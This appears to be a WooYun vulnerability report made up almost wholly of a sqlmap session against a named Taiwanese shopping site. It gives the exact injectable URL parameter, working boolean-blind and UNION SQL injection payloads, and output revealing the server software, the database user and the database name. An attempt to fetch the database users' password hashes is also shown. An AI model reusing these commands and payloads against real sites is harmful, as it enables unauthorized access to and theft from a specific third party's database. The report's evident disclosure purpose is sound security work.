WooYun.org

[root@Hacker~]# Sqlmap sqlmap.py -u "http://ismall.com.tw/product_list.php?mode=116" --dbs --passwords --current-user --current-db --is-dba
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no
[*] starting at 13:56:50
[13:56:50] [INFO] resuming back-end DBMS 'mysql'
[13:56:51] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: mode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mode=116' AND 8874=8874 AND 'dBki'='dBki
    Type: UNION query
    Title: MySQL UNION query (NULL) - 35 columns
    Payload: mode=116' UNION ALL SELECT CONCAT(0x7162766571,0x504a75795a534158526b,0x7175716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
---
[13:56:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 4.3.9
back-end DBMS: MySQL 4
[13:56:51] [INFO] fetching current user
current user:    'ismall@%'
[13:56:51] [INFO] fetching current database
current database:    'ismall'
[13:56:51] [INFO] testing if current user is DBA
[13:56:51] [INFO] fetching current user
[13:56:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[13:56:52] [INFO] fetching database users password hashes
[13:56:52] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[13:56:53] [WARNING] the SQL query provided does not return any output
[13:56:53] [INFO] fetching database users
[13:56:54] [WARNING] the SQL query provided does not return any output
[13:56:54] [INFO] fetching number of database users
[13:56:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:56:54] [INFO] retrieved:
[13:56:55] [CRITICAL] unable to retrieve the number of database users
[13:56:55] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[13:56:56] [WARNING] the SQL query provided does not return any output
[13:56:56] [INFO] fetching number of databases
[13:56:56] [INFO] retrieved:
[13:56:57] [ERROR] unable to retrieve the number of databases
[13:56:57] [INFO] falling back to current database
[13:56:57] [INFO] fetching current database
available databases [1]:
[*] ismall
[13:56:57] [INFO] fetched data logged to text files under 'E:\INJECT~1\SQLMAP~1.4\Bin\output\ismall.com.tw'